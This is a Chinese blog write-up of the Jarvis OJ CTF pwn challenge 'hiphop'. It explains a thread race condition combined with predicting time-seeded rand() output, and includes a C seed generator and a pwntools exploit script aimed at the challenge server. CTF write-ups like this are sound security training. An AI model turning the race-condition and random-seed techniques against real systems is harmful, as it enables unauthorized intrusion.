jarvis oj pwn hiphop writeup

最新推荐文章于 2019-08-05 15:10:43 发布
最新推荐文章于 2019-08-05 15:10:43 发布
阅读量362 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79152388
版权

这题真的感觉挺新颖的

首先说下这题的漏洞是什么

条件竞争!

一开始我看到这题是懵逼的,为什么好像常规的下标越界,缓冲区越界之类的都没有
然后其中一个功能又非常奇怪,要开线程?
然后看到这个函数里面某个地方一大堆sleep,于是就猜是条件竞争了

这题是打boss,然后每次都会随机一下出招,只要能预测出出招是什么就能防御
然后回想起以前打pwnable的一题,也是同样靠本地的时间与服务器时间相同,然后随机序列就可以预测出来了
于是我靠另外一题的shell来登上服务器,看了下时间,发现是标准utc时间,然后把本地的时区设成和服务器一样,时间也设一样

然后再说回来条件竞争
在看use_skill那个函数的时候发现一个非常可疑的地方
这里写图片描述
但是上面判断的时候是(QWORD*)
然后上面选择函数那里,只有两个技能是会sleep(1)的,那就是 fireball,icesword ,而iceword设的攻击就是0xFFFFFFFF,level4的boss血量是0x7FFFFFFFFFFFFFFE,只要加2,boss的血量就会变成负数,判断的那里就会判定boss死亡
所以首先是选择fireball,然后use_skill
这个时候会sleep(1),但是主线程还在跑,这个时候可以change_skill,选择iceword,再use_skill,这个时候fireball攻击的那个线程sleep结束,但是这个时候设的攻击是iceword的攻击,所以boss的血量就会+1,连续这样两次之后就能拿到flag了

ps:记得同步一下时间,我虚拟机时间迷之会越跑越慢。。。然后最好是在美国的vps上面跑,本地跑的话到条件竞争那里很可能会失败。。。

下面是payload
gen_rand.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main()
{
    int i;

    srand(time(0));

    for(i = 0; i < 1000; i ++)
    {
        int t=rand();
        printf("%d\n", t);
    }
    return 0;
}

hip.py

from pwn import *
import time
import os

debug=1
index=0

if debug:
    p=process('./hiphop')
    #gdb.attach(proc.pidof(p)[0])
    context.log_level='debug'
else:
    context.log_level='debug'
    p=remote('pwn2.jarvisoj.com', 9894)

rand_data=[int(i) for i in os.popen('./gen_rand')]

def deal(rand):
    if rand%4==0:
        return str(1)
    elif rand%4==1:
        return str(3)
    return str(2)

def use_skill(skill,rand_data,index,wait):
    p.sendline('2')
    if wait:
        #p.recvuntil('Boss')
        time.sleep(0.01)
    else:
        p.recvuntil('select shield')
        sleep(0.1)
    if skill==3 or skill==2:
        index+=1
    elif skill==7:
        index+=3
    p.sendline(deal(rand_data[index]))
    index+=1
    d=p.recvuntil('6. Exit\n')
    try:
        if(d.index('level:4')):
            print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
            return True,index
    except:
        pass
    return False,index

def change_skill(index):
    p.sendline('3')
    p.recvuntil('9. hollylight')
    #time.sleep(0.01)
    p.sendline(str(index))
    p.recvuntil('6. Exit')
    #time.sleep(0.01)

change_skill(3)

for i in range(100):
    l4,ind=use_skill(3,rand_data,index,True)
    index=ind
    if l4:
        break

for i in range(2):
    change_skill(2)
    l4,ind=use_skill(2,rand_data,index,False)
    index=ind
    if debug:
        sleep(0.6)
    change_skill(7)
    l4,ind=use_skill(7,rand_data,index,False)
    index=ind
    sleep(1)

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisOJ Pwn writeup
KGYSaikou的博客
05-10 114
1.level0 checksec一下 64位程序,只开启了堆栈不可执行保护 用IDA打开 主函数非常简单,输出Hello World以后调用vulnerable_function()函数,并返回该函数的返回值 vulnerable_function()函数内定义了一个字符变量buf,用read函数读取字符(串)到buf中 这里我们可以发现,buf的距离rbp的长度为80h,而read可以读取200h个字符,会造...
jarvisoj pwn level6 writeup
charlie_heng的专栏
01-21 1717
考完试了,又开始做题 这题是一道很好的用来熟悉堆的题 首先先确定漏洞的地方是delete note 漏洞有两个 1. 没有校验对应的堆是否有free 2. delete完之后没有把指向堆的指针清除 所以可以利用double free,触发unlink,达到任意内存修改的目的 具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html
18.9.18 Jarvis OJ PWN----[XMAN]level2
qq_42192672的博客
09-18 211
先检测文件 我们可以看到没有栈保护,可以利用栈溢出 拖进IDA 先是一个vulnerable_function函数,同时在函数列表中我们可以看到有system函数,我们可以把returnaddress牵引到system函数上,执行/bin/sh语句 buf的偏移量是0x88个字节,花0x04个字节覆盖ebp,然后伪造returnsddress跳转到system,再加上用来给syst...
Jarvis OJ PWN题解 持续更新~
qq_41071646的博客
03-28 1090
最近沉(被)迷(迫)学pwn 看我们的志琦大佬 我就知道 pwn 玩玩就行 但是 不认真学 不行 然后向大佬打听了几个pwn的平台网站 打算 玩一下 这里找到了Jarvis OJ 然后我 是看那个 做出来的人多 我就做那个·~~~~~~~ 不定期的更新 Tell Me Something 然后这个这道题 其实很简单 栈溢出 没有任何防护 就防护了 ...
jarvis oj pwn calc.exe writeup
charlie_heng的专栏
02-19 472
这题其实难是难在代码比较多,要审计比较长时间 首先checksec,发现没开NX,估计就是要用shellcode了 然后审计了一波,粗略发现了两个漏洞 1. 没有检查calloc出来那几个堆是否满了,有可能会溢出到下一个堆,但是这里用不了,所以不详细说了 2. 使用var ,可以添加add sub等已经存在的函数,从而实现替代了函数功能的作用 这里用的就是第二个漏洞 var add =...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
Jarvis声音.zip
09-28
"Jarvis声音.zip"这个压缩包文件显然与流行的科幻角色——钢铁侠托尼·斯塔克的人工智能助手Jarvis有关。Jarvis,全名Just A Rather Very Intelligent System,是漫威宇宙中的一个标志性元素,其在电影中以其独特、...
jarvis oj DebugMe writeup
charlie_heng的专栏
11-27 564
话说这题真的是玄学做出来的。。。首先看一波main函数sub_A30这里是fork了一个子进制,然后调用ptrace post了一些东西到子进程那里然后这里就是异或了一波输入的东西接着在下面看到有这个东西,也是输入异或了一波这里的判断条件有点看得不是很懂,这里也不多说。。。免得误导这里插了一个breakpoint,目测就是跟上面子进程那里有关在sub_c14里面就是主要的判断逻辑的地方v3就是传进
jarvis oj pwn xwork writeup
charlie_heng的专栏
02-21 572
这题没libc,因此利用起来比较麻烦,而且它还去掉了那些one_gadget 首先漏洞很明显,可以use after free,所以可以进行fastbin attack,但是fastbin attack会检查size,所以只能控制某些地方的内存,但是之后怎么用呢? 想了半天,想出一个比较长的利用链,如果有其他比较简便的方法,欢迎交流! 利用链如下: fastbin attack -&gt; ...
cgpwn2 writeup
ditto的博客
01-07 1713
拿到题目检查防护: 简单运行下: 放到ida里看下: hello函数的代码如下: char *hello() { char *v0; // eax signed int v1; // ebx unsigned int v2; // ecx char *v3; // eax char s; // [esp+12h] [ebp-26h] int v6; // [esp+1...
jarvisOJ)(pwn)level6_x86
PLpa的博客
08-05 427
Unlink!Unlink!Unlink! level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.csdn.net/weixin_41617275/article...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2029
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
Writeup of level3(Pwn) in JarvisOJ
cossack9989的博客
02-14 1540
又拾起了被我搁在一边快一个月的Pwn……(这一个月我被Android逆向拐跑了?) 不扯了,看题。 0x00 checksec 拿到文件先查checksec,得到如下信息: root@kali:~/Desktop/Pwn/level3# checksec level3 [*] '/root/Desktop/Pwn/level3/level3' Arch: i386-32-l
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 990
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
Jarvisoj 逆向总结
Assassin
10-13 3823
因为本人是菜鸟,所以由简单但难的做了 [61dctf]androideasy 没什么可说的,直接反汇编打求一下密码 #_*_coding:utf-8_*_ a=[113, 123, 118, 112, 108, 94, 99, 72, 38, 68, 72, 87, 89, 72, 36, 118, 100, 78, 72, 87, 121, 83, 101, 39, 62, 94,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值